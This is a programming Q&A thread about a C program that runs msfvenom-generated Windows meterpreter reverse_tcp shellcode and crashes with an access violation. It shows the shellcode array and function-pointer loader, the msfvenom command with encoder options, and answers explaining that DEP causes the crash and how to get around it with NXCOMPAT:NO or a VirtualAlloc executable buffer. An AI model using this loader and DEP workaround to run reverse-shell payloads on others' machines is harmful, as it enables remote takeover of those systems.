2

I encounter a problem when I try to execute a shellcode in C, (a basic reverse_tcp, pointing to a local address).

I started from the basics with the following code:

#define WIN32_LEAN_AND_MEAN
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <windows.h>



int main(int argc, char * argv[])
{

    unsigned char shellcode[] = \
        "\xfd\xab\xd2\xa9\xb1\x29\xe0\xdd\x38\x64\x51\x24\x9d\x0f\xdf"
        "\x8a\xc2\x01\x0d\x2e\x6c\x9b\x86\xa9\x2e\x6f\xd9\xb3\x04\x4a"
        "\x35\x1c\x0a\xc6\xe7\x18\xf4\xaf\x3e\xed\x4b\x5c\x1a\x08\x8b"
        "\x71\x27\x5e\x20\xd1\x4d\xaf\x8f\x2d\x23\xe1\x68\x25\xf3\x19"
        "\xd2\x7b\x5e\xca\x26\x2a\xc7\xa0\x98\x64\x72\x7b\x03\x05\xf0"
        "\x46\x03\xdf\x19\x86\xfb\x04\xd0\x7d\xd9\xf8\xa0\xfb\x8c\xa0"
        "\x2d\xb2\xcb\x7f\xde\x7c\xc4\xd4\xe6\x94\xde\x56\x81\x53\xfc"
        "\x59\xe3\xfc\xb6\x7d\x50\x7e\xde\x6d\xf0\x8a\x33\x35\x99\xfc"
        "\x66\x0c\x45\xf0\xdc\xcb\x49\x4d\xa1\x2f\xd7\xaf\x59\xdc\xcf"
        "\x90\x8b\xd3\x7c\xb7\x7e\x6f\xa8\x15\xe4\x1d\xfd\xc2\xe7\x9d"
        "\x15\x88\x8b\xfb\x3b\x30\x1d\x41\xe6\x22\xdf\x3f\x4f\xb8\xe3"
        "\x65\x0d\xa8\xc1\x0a\x2d\xe9\x77\x7d\x84\x83\xa7\xfc\x29\x80"
        "\x72\xcd\xcc\x68\xa1\x08\x35\xda\xba\x01\xe2\xe5\x01\xe9\x05"
        ;


    int(*ret)() = (int(*)())shellcode;
    ret();

}


return 1;
}

(I cut the shellcode for the example) when I compile this .c file with visual studio community 2017, I get a few warnings about argv and argc that aren't used, and conversion from () to (void) in ret.

Then I try to execute the file, and i get an awesome "has stopped working". So I launch the debug in visual studio,and here is what i get:

debug

So this is an access violation error, but why? I searched on google, and it seems that this error can have many causes, but I can't figure why it happens to me.

EinderJam
  • 417
  • 1
  • 6
  • 20
  • 1
    Is the shellcode designed for your platform?.... – LPs Jun 01 '17 at 07:49
  • 1
    The warning about `argv`and `argc` is useless. It is just telling you that you don't use them. You might as well write `int main(void)` – Badda Jun 01 '17 at 07:51
  • Tell us more about this shellcode. What is it? Where did you get it from? Do you have the source code? If yes, show it. The problem is in the shellcode. – Jabberwocky Jun 01 '17 at 08:00
  • 1
    You're trying to execute a chunk of code on the stack - most likely the stack pages are not marked as executable. Try it with Windows 95 or 98 - it should work there. – Paul R Jun 01 '17 at 08:06
  • Other suggestion: step through the assembly code with the debugger. – Jabberwocky Jun 01 '17 at 08:08
  • I generated the shellcode myself using this command on a fully updated Kali Linux 2017.1 : msfvenom -p windows/meterpreter/reverse_tcp LHOST=my_ip LPORT=port -e x86/shikata_ga_nai -i 4 -f c (i guess the shellcode is correctly designed) – EinderJam Jun 01 '17 at 11:01
  • Mixing shell code designed for Linux and Windows it not going to work. – Jabberwocky Jun 01 '17 at 12:13
  • It isn't designed for Linux,metasploit generates the payload for Windows because the payload is windows/meterpreter/reverse_tcp .I could add "--platform windows",but it would be useless since metasploit detects the target platform from the payload itself. – EinderJam Jun 01 '17 at 13:34
  • You are probably running into DEP. – Govind Parmar Jun 01 '17 at 16:06

2 Answers2

6

You normally can't execute code in the .data section of an executable on Windows. The access violation occurs because you're trying to run code that isn't executable.

https://msdn.microsoft.com/en-us/library/windows/desktop/aa366553(v=vs.85).aspx

Govind Parmar
  • 20,656
  • 7
  • 53
  • 85
  • 1
    You're right ! Adding NXCOMPAT:NO to build arguments makes the file run fine ! I'll now try to make my code DEP compatible ! Thank you very much ! – EinderJam Jun 01 '17 at 16:24
1

This is because .data section in PE is allocated without execute permission. Try this and disable DEP in linker settings if set

#include <Windows.h>

int main()
{
    const char shellcode[] = ".......";   
    void *exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, shellcode, sizeof(shellcode));
    ((void(*)())exec)(); ...
dgrandm
  • 375
  • 3
  • 12